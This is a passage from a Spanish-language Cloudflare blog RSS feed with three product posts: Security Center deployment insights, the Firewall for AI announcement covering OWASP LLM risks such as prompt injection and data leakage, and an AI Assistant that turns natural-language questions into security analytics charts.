            <content:encoded><![CDATA[ <p>Entendemos que uno de los principales obstáculos a los que se enfrentan nuestros clientes, especialmente las grandes organizaciones, es obtener una visión clara de la implementación de los servicios de Cloudflare en sus vastas y complejas infraestructuras. La cuestión no es sólo si Cloudflare está implementado, sino si está totalmente optimizado en todos los activos y servicios. Para hacer frente a este desafío, estamos implementando un nuevo conjunto de funciones diseñadas para mejorar la visibilidad y el control de tu postura de seguridad.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7M5yJ8aoOlRhR4sSsV4rgM/4634f2c04e6bef1400ce6ea024a032d7/image3-1.png" />
            
            </figure>
    <div>
      <h3>El problema que abordamos</h3>
      <a href="#el-problema-que-abordamos">
        
      </a>
    </div>
    <p>El problema principal que estamos abordando es la creciente complejidad de las ciberamenazas y la superficie de ataque en expansión, que complica el mantenimiento de una postura de seguridad eficaz para nuestros clientes.</p><p>No es infrecuente que las organizaciones implementen diversas soluciones de seguridad, incluidas las nuestras, sin optimizar y aplicar plenamente sus configuraciones. El resultado es una falsa sensación de seguridad, inversiones infrautilizadas y, peor aún, la exposición de vulnerabilidades. Nuestros clientes expresan con frecuencia su preocupación por no tener una imagen clara de su postura de seguridad en toda su infraestructura, por no saber si los activos críticos están protegidos adecuadamente o si se podrían aprovechar mejor funciones de seguridad específicas de Cloudflare.</p><p>Queremos ofrecer a los usuarios una visibilidad integral de sus configuraciones de seguridad y del estado de sus implementaciones en todo el conjunto de productos de Cloudflare. Al proporcionar información útil sobre las áreas insuficientemente configuradas, los recursos no asignados o las funciones no utilizadas, pretendemos cerrar las brechas de seguridad y mejorar los mecanismos generales de protección de los ecosistemas digitales de nuestros clientes. Esta mejora no consiste sólo en aprovechar la tecnología, sino en promover una cultura de gestión proactiva de la seguridad, en la que cada pieza de la infraestructura digital esté protegida de forma coherente y óptima.</p>
    <div>
      <h3>Cómo lo resolvemos en el Centro de seguridad</h3>
      <a href="#como-lo-resolvemos-en-el-centro-de-seguridad">
        
      </a>
    </div>
    <p><a href="/security-center/">Hace más de dos años</a>, asumimos la misión de consolidar nuestro amplio conjunto de productos de seguridad, nuestra experiencia en seguridad y nuestros conocimientos únicos sobre las amenazas de Internet en una solución integral: el  <a href="https://www.cloudflare.com/en-gb/application-services/products/securitycenter/">Centro de seguridad</a> de Cloudflare. Lanzado con la visión de simplificar la gestión de la superficie de ataque y de proporcionar información avanzada sobre seguridad útil para las organizaciones de todos los tamaños, desde entonces el Centro de seguridad se ha convertido en la vista rápida única para evaluar tu postura de seguridad.</p><p>Hoy, sobre esta base, abordamos un punto débil de muchos de nuestros grandes clientes: garantizar la protección completa de Cloudflare en toda su infraestructura digital.</p><p>Nuestra última actualización del Centro de seguridad se centra en ofrecer información detallada sobre el estado de implementación de Cloudflare en tus activos digitales. Esto incluye identificar las aplicaciones en las que servicios críticos como WAF, Access y otras herramientas de protección de la seguridad podrían no estar totalmente configurados u optimizados, debilitando así tu postura de seguridad.</p><p>Además de esta información, presentamos una vista rápida en la información del Centro de seguridad, diseñada para ofrecer a los directores de seguridad de la información y a los equipos de seguridad una visión rápida y completa de las configuraciones actuales de sus productos de Cloudflare en un momento dado, junto con recomendaciones de mejoras, bajo la instantánea Optimización de la seguridad en el panel de control.</p><p>Aprovechando esta nueva información, los usuarios de Cloudflare ahora pueden tomar medidas proactivas para cerrar cualquier brecha de su infraestructura de seguridad. Al ofrecer una visión granular de dónde se pueden utilizar mejor los servicios específicos de Cloudflare, no sólo resolvemos un problema de visibilidad, sino que proporcionamos información útil sobre seguridad. Esto significa que pueden tomarse decisiones con rapidez, garantizando que tus defensas no sólo respondan a las amenazas potenciales, sino que se anticipen a ellas.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/48Ts4LyhRSDf9Ls61ftOHD/34e3f3f5eb8115fa81158295af8c9335/image1-2.png" />
            
            </figure><p>Por ejemplo, destacaremos si WAF está implementado sólo en algunas tus zonas, dónde podría utilizarse la seguridad del correo electrónico, o si determinados activos no están protegidos por los controles de acceso. También te facilitamos la tarea de ver si te falta alguna configuración crítica, como Page Shield, asegurándonos de que el producto está configurado para que no sólo estés un paso más cerca de cumplir normas como PCI DSS, sino que también estés protegido contra las amenazas en constante evolución. Exponemos los puntos finales de la API recién descubiertos que también requieren tu atención.</p><p>Por último, los usuarios ya pueden exportar su información sobre seguridad utilizando nuestra <a href="https://developers.cloudflare.com/api/operations/get-security-center-issue-types">API pública</a>, y pronto podrán hacer lo mismo directamente desde el panel de control de Cloudflare, ¡con solo un clic!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/FZV6K08ssc7UM60Za47zs/f93d568b1b851dbfd144562312b91fc1/image2-1.png" />
            
            </figure>
    <div>
      <h3>Acceder a la información del Centro de seguridad</h3>
      <a href="#acceder-a-la-informacion-del-centro-de-seguridad">
        
      </a>
    </div>
    <p>La información del Centro de seguridad está disponible para todos los usuarios del panel de Cloudflare que sean administradores de su cuenta de Cloudflare.</p><p>Independientemente del tamaño o del alcance de tu implementación, nuestro objetivo es dotar a cada usuario de las herramientas necesarias para lograr una postura de seguridad eficaz, en la que pueda influir continuamente mejorando las configuraciones existentes, añadiendo nuevas soluciones y descubriendo nuevas vulnerabilidades.</p>
    <div>
      <h3>Hoja de ruta del futuro Centro de seguridad</h3>
      <a href="#hoja-de-ruta-del-futuro-centro-de-seguridad">
        
      </a>
    </div>
    <p>Añadimos continuamente más información relevante sobre seguridad para ayudarte a mejorar tu postura de seguridad. Incluye la infraestructura expuesta, las configuraciones no seguras, las optimizaciones, los nuevos productos y mucho más, así como la posibilidad de exportarla fácilmente para la elaboración de informes. Asimismo, sigue atento para descubrir una plataforma de informes completamente nueva que te entregará automáticamente información sobre seguridad seleccionada y contextualizada directamente en tu bandeja de entrada, demostrando la eficiencia de la cartera de productos de seguridad de Cloudflare. Los informes periódicos se complementarán con una experiencia personalizada e interactiva de elaboración de informes en el panel de control.</p><p>Echa un vistazo a tu información sobre seguridad en el Centro de seguridad de tu cuenta y toma medidas para mejorar tu postura de seguridad con Cloudflare.</p><p>Si quieres unirte a nosotros para desarrollar el Centro de seguridad u otros interesantes productos de Cloudflare, consulta nuestros <a href="https://www.cloudflare.com/careers/jobs/">puestos vacantes</a> y obtén más información sobre <a href="https://www.cloudflare.com/en-gb/careers/">el día a día en Cloudflare</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Centro de seguridad]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Security Posture (ES)]]></category>
            <category><![CDATA[Insights]]></category>
            <guid isPermaLink="false">2lC0z3ZmqQffklxIp7UXzw</guid>
            <dc:creator>Alexandra Moraru</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare anuncia Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/es-es/firewall-for-ai/</link>
            <pubDate>Mon, 04 Mar 2024 14:02:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare es uno de los primeros proveedores en proteger los modelos de lenguaje de gran tamaño y los usuarios en la era de la IA ]]></description>
            <content:encoded><![CDATA[ <p>Hoy Cloudflare presenta el desarrollo de Firewall for AI, una capa de protección que se puede implementar delante de <a href="https://www.cloudflare.com/en-gb/learning/ai/what-is-large-language-model/">modelos de lenguaje de gran tamaño (LLM)</a> para identificar los abusos antes de que lleguen a los modelos.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5EdkABBZiYVEgdEQ42QaUf/c73d263a1fbae676983868a314e2acf5/WAF-for-AI.png" />
            
            </figure><p>Aunque los modelos de IA, y específicamente los LLM, están en auge, los clientes nos indican que les preocupa encontrar las mejores estrategias para proteger sus propios LLM. La utilización de los LLM como parte de las aplicaciones conectadas a Internet añade nuevas vulnerabilidades que los ciberdelincuentes pueden aprovechar.</p><p>Algunas de las vulnerabilidades que afectan a las aplicaciones web y API tradicionales también son aplicables al mundo de los LLM, como las inyecciones o la exfiltración de datos. Sin embargo, hay un nuevo conjunto de amenazas que ahora son relevantes debido a cómo funcionan los LLM. Por ejemplo, los investigadores han <a href="https://thehackernews.com/2024/02/new-hugging-face-vulnerability-exposes.html">descubierto recientemente</a> una vulnerabilidad en una plataforma de colaboración de IA que les permite secuestrar modelos y realizar acciones no autorizadas.</p><p>Firewall for AI es un <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">firewall de aplicaciones web (WAF)</a> avanzado, personalizado específicamente para las aplicaciones que utilizan LLM. Constará de un conjunto de herramientas que se pueden implementar delante de las aplicaciones para detectar vulnerabilidades y ofrecer visibilidad a los propietarios de los modelos. Este conjunto de herramientas incluirá productos que ya forman parte de WAF, como la limitación de velocidad y la detección de datos confidenciales, y una nueva capa de protección que está actualmente en desarrollo. Esta nueva validación analiza la instrucción que envía el usuario final para identificar los intentos de explotar el modelo a fin de extraer datos y otros tipos de abuso. Gracias al gran tamaño de la red de Cloudflare, Firewall for AI se ejecuta lo más cerca posible del usuario. Esto nos permite identificar los ataques en un etapa temprana y proteger tanto al usuario final como a los modelos contra abusos y ataques.</p><p>Antes de analizar el funcionamiento de Firewall for AI y su completo conjunto de funciones, analicemos primero qué hace únicos a los LLM, y las superficies de ataque que introducen. Como referencia, utilizaremos las <a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/">10 principales vulnerabilidades de OWASP para LLM</a>.</p>
    <div>
      <h2>¿Por qué los LLM difieren de las aplicaciones tradicionales?</h2>
      <a href="#por-que-los-llm-difieren-de-las-aplicaciones-tradicionales">
        
      </a>
    </div>
    <p>Al considerar los LLM como aplicaciones conectadas a Internet, observamos dos diferencias principales respecto a las aplicaciones web más tradicionales.</p><p>En primer lugar, la forma como los usuarios interactúan con el producto. Las aplicaciones tradicionales son deterministas por naturaleza. Considera una aplicación bancaria. Se define en función de un conjunto de operaciones (consultar mi saldo, realizar una transferencia, etc.). Podemos garantizar la seguridad de la operación comercial (y de los datos) controlando el conjunto específico de operaciones que aceptan estos puntos finales: "GET /balance" o "POST /transfer".</p><p>Por diseño, las operaciones de los LLM son no deterministas. Para empezar, las interacciones con los LLM se basan en el lenguaje natural, por lo que identificar las solicitudes problemáticas es más difícil que la correspondencia con firmas de ataque. Además, a menos que haya una respuesta almacenada en la caché, los LLM suelen ofrecer una respuesta distinta cada vez, incluso si se repite la misma instrucción de entrada. Por lo tanto, limitar cómo un usuario interactúa con la aplicación es considerablemente más complejo. Esto también plantea una amenaza para el usuario, ya que podría estar expuesto a información errónea que debilite la confianza en el modelo.</p><p>En segundo lugar, una diferencia importante es cómo el plano de control de la aplicación interactúa con los datos. En las aplicaciones tradicionales, el plano de control (el código) está claramente separado del plano de datos (la base de datos). Las operaciones definidas son la única forma de interactuar con los datos subyacentes (p. ej. "muéstrame el historial de mis transacciones de pago"). Esto permite a los expertos en seguridad centrarse en añadir comprobaciones y protección al plano de control y así proteger indirectamente la base de datos.</p><p>Los LLM difieren en que los datos de entrenamiento pasan a formar parte del propio modelo durante el proceso de entrenamiento, por lo que controlar cómo se comparten esos datos como resultado de la instrucción de un usuario resulta muy difícil. Se han estudiado algunas soluciones a nivel de arquitectura, como separar los LLM en distintos niveles y segregar los datos. Sin embargo, aún no se ha encontrado la fórmula mágica.</p><p>Desde una perspectiva de la seguridad, estas diferencias permiten a los ciberdelincuentes crear nuevos vectores de ataque dirigidos a los LLM y burlar las herramientas de seguridad existentes diseñadas para las aplicaciones web tradicionales.</p>
    <div>
      <h3>Vulnerabilidades OWASP para LLM</h3>
      <a href="#vulnerabilidades-owasp-para-llm">
        
      </a>
    </div>
    <p>La fundación <a href="https://owasp.org/">OWASP</a> <a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/">publicó una lista</a> de las 10 principales clases de vulnerabilidades para los LLM, proporcionando un marco útil para explorar cómo proteger los modelos de lenguaje. Algunas de las amenazas recuerdan a las <a href="https://owasp.org/www-project-top-ten/">10 principales vulnerabilidades de OWASP para aplicaciones web</a>, mientras que otras son específicas de los modelos de lenguaje.</p><p>Al igual que con las aplicaciones web, algunas de estas vulnerabilidades se pueden abordar mejor cuando la aplicación de LLM se ha diseñado, desarrollado y entrenado. Por ejemplo, el <i>envenenamiento de datos de entrenamiento</i> se puede llevar a cabo introduciendo vulnerabilidades en el conjunto de datos de entrenamiento utilizados para entrenar nuevos modelos. A continuación, la información envenenada se presenta al usuario cuando el modelo está activo. Las <i>vulnerabilidades de la cadena de suministro</i> y el <i>diseño de complemento no seguro</i> son vulnerabilidades introducidas en componentes añadidos al modelo, como paquetes de software de terceros. Por último, la gestión de la autorización y de los permisos es fundamental para abordar la <i>autonomía excesiva</i>, donde modelos no restringidos pueden realizar acciones no autorizadas en la aplicación o la infraestructura a nivel más general.</p><p>Por el contrario, la <i>inyección de instrucciones</i>, la <i>denegación de servicio del modelo</i> y la <i>divulgación de información confidencial</i> se pueden mitigar mediante la adopción de una solución de seguridad de proxy como Cloudflare Firewall for AI. En las secciones siguientes comentaremos en más detalle estas vulnerabilidades y cómo Cloudflare se encuentra en una posición privilegiada para mitigarlas.</p>
    <div>
      <h3>Implementaciones de LLM</h3>
      <a href="#implementaciones-de-llm">
        
      </a>
    </div>
    <p>Los riesgos de los modelos de lenguaje dependen también del modelo de implementación. Actualmente hay las tres principales estrategias de implementación: LLM internos, LLM públicos y LLM de productos. En los tres escenarios, debemos proteger los modelos contra los abusos, proteger los datos privados almacenados en el modelo y proteger al usuario final frente a información errónea o la exposición a contenido inadecuado.</p><ul><li><p><b>LLM internos:</b> las empresas desarrollan LLM para ayudar a sus empleados con sus tareas cotidianas. Estos LLM se consideran activos corporativos y no deberían ser accesibles a personas ajenas a la empresa. Por ejemplo, un copiloto de IA entrenado con datos de ventas e interacciones con los clientes utilizado para generar propuestas personalizadas, o un LLM entrenado con una base de conocimiento interna que los ingenieros pueden consultar.</p></li><li><p><b>LLM públicos:</b> son LLM a los que se puede acceder desde fuera de la empresa. Estas soluciones suelen tener versiones gratuitas que todo el mundo puede utilizar, y a menudo se entrenan con conocimientos generales o públicos. Pore ejemplo, <a href="https://openai.com/gpt-4">GPT</a> de OpenAI o <a href="https://www.anthropic.com/product">Claude</a> de Anthropic.</p></li><li><p><b>LLM de productos:</b> desde la perspectiva de una empresa, los LLM pueden formar parte de un producto o servicio ofrecido a sus clientes. Estos LLM suelen ser soluciones personalizadas y autoalojadas que pueden estar disponibles como una herramienta para interactuar con los recursos de la empresa. Por ejemplo, los chabots de asistencia o <a href="/es-es/security-analytics-ai-assistant-es-es/">Cloudflare AI Assistant</a>.</p></li></ul><p>Desde la perspectiva de los riesgos, la diferencia entre los LLM públicos y los LLM privados es quién resulta afectado cuando los ataques tienen éxito. Los LLM públicos se consideran una amenaza para los datos porque prácticamente cualquiera puede acceder a los datos que acaban formando parte del modelo. Esta es una de las razones por las que muchas empresas aconsejan a sus empleados que no incluyan información confidencial en las instrucciones de servicios disponibles públicamente. Los LLM de productos se consideran una amenaza para las empresas y su propiedad intelectual si los modelos han accedido a información privada durante el entrenamiento (ya sea por diseño o  inadvertidamente).</p>
    <div>
      <h2>Firewall for AI</h2>
      <a href="#firewall-for-ai">
        
      </a>
    </div>
    <p>Cloudflare Firewall for AI se implementará como un WAF tradicional, donde se analiza cada solicitud de API con una instrucción de LLM en busca de patrones y firmas de posibles ataques.</p><p>Firewall for AI se puede implementar delante de modelos alojados en la plataforma de Cloudflare <a href="/es-es/workers-ai-es-es">Workers AI</a> o de modelos alojados en cualquier otra infraestructura de terceros. Se puede utilizar junto con Cloudflare <a href="https://developers.cloudflare.com/ai-gateway/">AI Gateway</a>, y los clientes podrán controlar y configurar Firewall for AI mediante el plano de control de WAF.</p><p><i>Firewall for AI funciona como un firewall de aplicaciones web tradicional. Se implementa delante de una aplicación de LLM y se analiza cada solicitud para identificar firmas de ataque.</i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3kwApAqMHjSChjXkdc3H89/09efa7f0ed81746bf77c62376457d1c8/image1-1.png" />
            
            </figure>
    <div>
      <h3>Evitar los ataques volumétricos</h3>
      <a href="#evitar-los-ataques-volumetricos">
        
      </a>
    </div>
    <p>Una de las amenazas que incluye OWASP es la denegación de servicio del modelo. Al igual que con las aplicaciones tradicionales, se lanza un <a href="https://www.cloudflare.com/learning/ddos/glossary/denial-of-service/">ataque DoS</a>, consumiendo una cantidad excepcionalmente alta de recursos, lo que daña la calidad del servicio o puede aumentar los costes de ejecución del modelo. Debido a la gran cantidad de recursos que requiere la ejecución de los LLM, y a la imprevisibilidad de la entrada de los usuarios, este tipo de ataque puede ser dañino.</p><p>Es posible mitigar este riesgo mediante la adopción de políticas de limitación de velocidad que controlen la velocidad de las solicitudes de sesiones individuales, limitando por lo tanto la ventana de contexto. Hoy, redireccionando tu modelo a través de Cloudflare, te beneficias de <a href="https://www.cloudflare.com/ddos/">protección contra DDoS</a> lista para usar. También puedes utilizar la limitación de velocidad y la <a href="/advanced-rate-limiting/">limitación de velocidad avanzada</a> para gestionar la velocidad de las solicitudes que permites que lleguen a tu modelo, estableciendo una velocidad máxima de las solicitudes que puede enviar una dirección IP o una clave de API individual durante una sesión.</p>
    <div>
      <h3>Identificar información confidencial con la detección de datos confidenciales</h3>
      <a href="#identificar-informacion-confidencial-con-la-deteccion-de-datos-confidenciales">
        
      </a>
    </div>
    <p>Hay dos casos de uso para los datos confidenciales, en función de si eres propietario del modelo y de los datos, o de si deseas evitar que los usuarios envíen datos a los LLM públicos.</p><p>Según define <a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/">OWASP</a>, la <i>divulgación de información confidencial</i> se produce cuando los LLM revelan inadvertidamente datos confidenciales en las respuestas, lo que causa el acceso a datos no autorizados, violaciones de la privacidad y fallos de seguridad. Una forma de evitarlo es añadir estrictas validaciones de las instrucciones. Otra estrategia es identificar la información de identificación personal que sale del modelo. Esto es relevante, por ejemplo, cuando se ha entrenado un modelo con una base de conocimiento de una empresa que puede incluir información confidencial, como información de identificación personal (p. ej., números de la seguridad social), código privado o algoritmos.</p><p>Los clientes que utilizan modelos LLM detrás del WAF de Cloudflare pueden emplear el conjunto de reglas administradas del WAF de detección de datos confidenciales para identificar determinada información de identificación personal que devuelva el modelo en la respuesta. Los clientes pueden revisar las coincidencias de detección de datos confidenciales en los eventos de seguridad del WAF. Hoy, la detección de datos confidenciales se ofrece como un conjunto de reglas administradas diseñadas para analizar la información financiera (por ejemplo, números de tarjeta de crédito) así como secretos (claves de API). Como parte de la hoja de ruta, tenemos previsto permitir que nuestros clientes creen sus propias huellas digitales personalizadas.</p><p>El otro caso de uso tiene como objetivo evitar que los usuarios compartan información de identificación personal u otra información confidencial con proveedores de LLM externos, como OpenAI o Anthropic. Para estar protegidos ante esta situación, tenemos previsto ampliar la detección de datos confidenciales para analizar la instrucción de la solicitud e integrar su resultado con AI Gateway, donde, junto con el historial de la instrucción, detectamos si se han incluido determinada información confidencial en la solicitud. Empezaremos utilizando las reglas de detección de datos confidenciales y tenemos previsto permitir que los clientes escriban sus propias firmas personalizadas. De la misma forma, la ofuscación es otra función que nos comentan muchos de nuestros clientes. Cuando esté disponible, la detección de datos confidenciales ampliada permitirá que los clientes ofusquen determinados datos confidenciales en una instrucción antes de que estos lleguen al modelo. La detección de datos confidenciales en la fase de solicitud está en desarrollo.</p>
    <div>
      <h2>Evitar los abusos de los modelos</h2>
      <a href="#evitar-los-abusos-de-los-modelos">
        
      </a>
    </div>
    <p>El abuso de modelos es una categoría más amplia de abuso. Incluye estrategias como la "inyección de instrucciones" o el envío de solicitudes que generan alucinaciones o causan respuestas imprecisas, ofensivas, inadecuadas o simplemente no relacionadas con el tema.</p><p>La inyección de instrucciones es un intento de manipular un modelo de lenguaje mediante entradas elaboradas especialmente, que causan que el LLM devuelva respuestas no deseadas. Los resultados de una inyección pueden variar, desde extraer información confidencial a influenciar la toma de decisiones imitando las interacciones normales con el modelo. Un ejemplo clásico de inyección de instrucciones es manipular un CV para afectar al resultado de las <a href="https://kai-greshake.de/posts/inject-my-pdf/">herramientas de cribado de currículums</a>.</p><p>Un caso de uso común que nos comentan los clientes de nuestra solución AI Gateway es que quieren evitar que su aplicación genere lenguaje tóxico, ofensivo o problemático. Los riesgos de no controlar el resultado del modelo incluyen daños a la reputación y perjudicar al usuario final proporcionando una respuesta no fiable.</p><p>Podemos abordar estos tipos de abuso añadiendo una capa adicional de protección delante del modelo. Esta capa se puede entrenar para bloquear los intentos de inyección o para bloquear los intentos correspondientes a las categorías inapropiadas.</p>
    <div>
      <h3>Validación de las instrucciones y las respuestas</h3>
      <a href="#validacion-de-las-instrucciones-y-las-respuestas">
        
      </a>
    </div>
    <p>Firewall for AI ejecutará una serie de detecciones diseñadas para identificar los intentos de inyección de instrucciones y otros tipos de abuso, por ejemplo, garantizando que el tema se mantiene dentro de los límites que ha definido el propietario del modelo. Al igual que otras funciones existentes del WAF, Firewall for AI buscará automáticamente las instrucciones incorporadas en las solicitudes HTTP o permitirá a los clientes crear reglas según la ubicación del cuerpo JSON de la solicitud donde se puede encontrar la instrucción.</p><p>Una vez activado, el firewall analizará cada instrucción y proporcionará una puntuación según la probabilidad de que esta sea maliciosa. También etiquetará la instrucción según las categorías predefinidas. La puntuación va de 1 a 99 e indica la probabilidad de una inyección de instrucción, donde 1 es la probabilidad más alta.</p><p>Los clientes podrán crear reglas de WAF para bloquear o manejar las solicitudes con una puntuación determinada en una o en ambas de estas dimensiones. Podrás combinar esta puntuación con otros indicadores existentes (como la puntuación de bots o la puntuación de ataques) para determinar si la solicitud debe llegar al modelo o se debe bloquear. Por ejemplo, se podría combinar con una puntuación de bots para identificar si la solicitud era maliciosa y la ha generado una fuente automatizada.</p><p><i>La detección de las inyecciones de instrucciones y del abuso de instrucciones forman parte del ámbito de Firewall for AI. Iteración temprana del diseño del producto.</i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4dxfO29U9BurRgBykPOao0/5aa1619fa5ea3414b7954c78771d1360/Slice-1.png" />
            
            </figure><p>Además de la puntuación, asignaremos etiquetas a cada instrucción, que se pueden utilizar al crear reglas para impedir que las instrucciones correspondientes a cualquiera de estas categorías lleguen a su modelo. Por ejemplo, los clientes podrán crear reglas para bloquear temas específicos. Esto incluye las instrucciones que utilicen palabras categorizadas como ofensivas, o vinculadas a la religión, a contenido sexual o a la política, por ejemplo.</p>
    <div>
      <h2>¿Cómo puedo utilizar Firewall for AI? ¿Quién se puede beneficiar?</h2>
      <a href="#como-puedo-utilizar-firewall-for-ai-quien-se-puede-beneficiar">
        
      </a>
    </div>
    <p>Los clientes del plan Enterprise en la solución de seguridad avanzada para aplicaciones pueden empezar ya a utilizar la limitación de velocidad avanzada y la detección de datos confidenciales (en la fase de respuesta). Ambos productos se pueden encontrar en la sección del WAF del panel de control de Cloudflare. La función de validación de instrucciones de Firewall for AI está actualmente en desarrollo y lanzaremos una versión beta en los próximos meses para todos los usuarios de Workers AI. Inscríbete <a href="https://cloudflare.com/lp/firewall-for-ai/">en la lista de espera</a> y te avisaremos cuando la función esté disponible.</p>
    <div>
      <h2>Conclusión</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Cloudflare es uno de los primeros proveedores de seguridad que lanza un conjunto de herramientas para proteger las aplicaciones de IA. Con Firewall for AI, los clientes pueden controlar qué instrucciones y solicitudes llegan a sus modelos de lenguaje, reduciendo el riesgo de abusos y la exfiltración de datos. Sigue atento para saber más sobre la evolución de la seguridad para las aplicaciones de IA.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Plataforma para desarrolladores]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[Servicios de aplicación]]></category>
            <guid isPermaLink="false">6mqhKmVt1dGOhO5xNsli3k</guid>
            <dc:creator>Daniele Molteni</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare lanza AI Assistant para los análisis de seguridad]]></title>
            <link>https://blog.cloudflare.com/es-es/security-analytics-ai-assistant/</link>
            <pubDate>Mon, 04 Mar 2024 14:00:29 GMT</pubDate>
            <description><![CDATA[ AI Assistant para los análisis de seguridad. Ahora es más fácil que nunca obtener datos eficaces sobre tu seguridad web. Utiliza la nueva interfaz integrada de consulta en lenguaje natural para explorar los análisis de seguridad ]]></description>
            <content:encoded><![CDATA[ <p>Imagina que están atacando tu aplicación de producción más importante, y necesitas comprender que está ocurriendo. ¿Qué te parecería si simplemente pudieras iniciar sesión en el panel de control y escribir una pregunta como, por ejemplo, "Compare attack traffic between US and UK" (Compara el tráfico de ataques entre EE. UU. y el Reino Unido) o “Compare rate limiting blocks for automated traffic with rate limiting blocks from human traffic” (Compara los bloqueos de limitación de velocidad para el tráfico automatizado con los bloqueos de limitación de velocidad para el tráfico de usuarios humanos) y que se mostrara en la pantalla un gráfico de series temporales sin necesidad de seleccionar un complejo conjunto de filtros?</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1XqHKAmbIZ4NBeFBXsnaFp/4d66b61833021c41d054dbfd5d8d23c6/AI-Assistant-for-Security-AnalyticsNatural-Language.png" />
            
            </figure><p>Hoy anunciamos un asistente de IA que te ayudará a consultar tus datos relacionados con los eventos de seguridad, con el que podrás descubrir más rápido las anomalías y los potenciales ataques a la seguridad. Ahora puedes utilizar el lenguaje natural para realizar preguntas a los análisis de Cloudflare y nosotros nos encargamos del resto.</p>
    <div>
      <h2>¿Qué hemos desarrollado?</h2>
      <a href="#que-hemos-desarrollado">
        
      </a>
    </div>
    <p>Una de las mayores dificultades al analizar un pico de tráfico o cualquier anomalía de tu tráfico es crear los filtros para aislar la causa del problema. Esto implica saber manejar paneles de control y herramientas a menudo complejos, y saber dónde hacer clic y qué filtrar.</p><p>Además, lo que te puede ofrecer cualquier panel de control de seguridad tradicional se ve limitado por cómo estén almacenados tus datos, cómo estén indexadas las bases de datos y qué campos se permitan al crear los filtros. Con nuestra vista de los análisis de seguridad, por ejemplo, era difícil comparar series temporales con distintas características. Por ejemplo, no podías comparar el tráfico de la dirección IP x.x.x.x con el tráfico automatizado de Alemania sin abrir varias pestañas de los análisis de seguridad y filtrarlas por separado. Desde una perspectiva de la ingeniería, sería sumamente complicado desarrollar un sistema que permitiera estos tipos de comparaciones sin restricciones.</p><p>Con AI Assistant, eliminamos esta complejidad utilizando nuestra plataforma Workers AI para desarrollar una herramienta que puede ayudarte a consultar tu solicitud HTTP y tus datos de eventos de seguridad, así como a generar gráficos de series temporales basados en una solicitud elaborada con lenguaje natural. Ahora AI Assistant se ocupa de la compleja tarea de averiguar cuáles son los filtros necesarios, y también puede representar varias series de datos en un solo gráfico para facilitar las comparaciones. Esto ofrece nuevas posibilidades de examinar los datos y los registros, sin las restricciones de los paneles de control tradicionales.</p><p>Ahora es más fácil que nunca obtener datos eficaces sobre la seguridad de tus aplicaciones utilizando lenguaje natural para consultar tus datos y comprender mejor cómo Cloudflare protege tu negocio. El nuevo AI Assistant se encuentra en el panel de control de análisis de seguridad y funciona de manera eficaz con los filtros existentes. Obtén las respuestas que necesitas con una simple pregunta.</p>
    <div>
      <h2>¿Qué puedo preguntar?</h2>
      <a href="#que-puedo-preguntar">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/65fA9saL0RoHlbErGhKGhL/53e0498be059490a3d442ea383136d8e/Screenshot-2024-02-29-at-13.35.32.png" />
            
            </figure><p>Para demostrar las funcionalidades de AI Assistant, hemos empezado considerando las preguntas que nos planteamos nosotros mismos a diario cuando ayudamos a los clientes a implementar las mejores soluciones de seguridad para sus aplicaciones.</p><p>Para ayudarte a empezar, hemos incluido en el panel de control algunos ejemplos en los que puedes hacer clic.</p><p>Con AI Assistant puedes:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7lHKu9aErFzilFDlPId4lL/80a67fb2e3e558ea0a4626ff166fdbd3/ai-analytics.png" />
            
            </figure><ul><li><p>Identificar la fuente de un pico del tráfico de ataques. Pregunta: "Compare attack traffic between US and UK" (Compara el tráfico de ataques entre EE. UU. y el Reino Unido).</p></li><li><p>Identificar la causa de errores 5xx. Pregunta: "Compare origin and edge 5xx errors” (Compara los errores 5XX en el origen y en el perímetro).</p></li><li><p>Ver qué navegadores utilizan tus usuarios más habitualmente. Pregunta: "Compare traffic across major web browsers" (Compara el tráfico de los principales navegadores web).</p></li><li><p>Comprender qué porcentaje de usuarios visitan vs. añaden artículos a su carrito de compra (en un sitio de comercio electrónico). Pregunta: "Compare traffic between /api/login and /api/basket" (Compara el tráfico entre /api/login y /api/basket).</p></li><li><p>Identificar los ataques de bots contra tu sitio de comercio electrónico. Pregunta: “Show requests to /api/basket with a bot score less than 20" (Muestra las solicitudes enviadas a /api/basket con una puntuación de bots inferior a 20).</p></li><li><p>Identificar las versiones de HTTP que utilizan los clientes. Pregunta: "Compare traffic by each HTTP version" (Compara el tráfico de cada versión de HTTP).</p></li><li><p>Identificar el tráfico automatizado no deseado a puntos finales específicos. Pregunta: “Show POST requests to /admin with a Bot Score over 30" (Muestra las solicitudes POST a /admin con una puntuación de bots superior a 30).</p></li></ul><p>Puedes empezar a explorar AI Assistant con estas preguntas.</p><div>
  
</div>
    <div>
      <h2>¿Cómo funciona?</h2>
      <a href="#como-funciona">
        
      </a>
    </div>
